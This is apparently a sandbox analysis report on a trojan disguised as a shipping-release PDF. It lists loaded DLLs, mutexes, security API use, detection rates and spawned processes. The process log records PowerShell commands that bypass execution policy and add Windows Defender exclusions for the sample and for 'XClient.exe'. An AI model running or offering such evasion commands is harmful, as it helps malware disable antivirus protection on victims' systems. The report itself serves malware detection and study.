Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, gtv0gssvKWWRAOg38T65o.cs	Base64 encoded string: 'Y2m7z9x6jWcENPlNUeR5pyCUQgkINBomStoNpnlrWGD5k8Gdna37HW29JZ4or9rJpFPkm1RbMV6kU97GRxKdNyK7'

Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	Security API names: _0020.SetAccessControl
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	Security API names: _0020.AddAccessRule
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, y42W1bnvO6P0K.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2ab9c80.2.raw.unpack, y42W1bnvO6P0K.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3c11a70.3.raw.unpack, fVLhd3v9vj97x0ul7x.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, y42W1bnvO6P0K.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.2a5cb48.0.raw.unpack, y42W1bnvO6P0K.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	Security API names: _0020.SetAccessControl
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	Security API names: _0020.AddAccessRule
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	Security API names: _0020.SetAccessControl
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, GMDabFXwmBm7Pyr7c7.cs	Security API names: _0020.AddAccessRule
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.3bc1650.4.raw.unpack, fVLhd3v9vj97x0ul7x.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.6d80000.6.raw.unpack, fVLhd3v9vj97x0ul7x.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@15/21@0/1

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1896:120:WilError_03
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Mutant created: \Sessions\1\BaseNamedObjects\XczLagvCjDnYaiUQ
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	ReversingLabs: Detection: 18%
Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Virustotal: Detection: 28%

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

String found in binary or memory: $72794fd6-9579-4364-adda-1580f4b1038b

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

File read: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe "C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe"
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe "C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe"
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe "C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe'	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe'	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
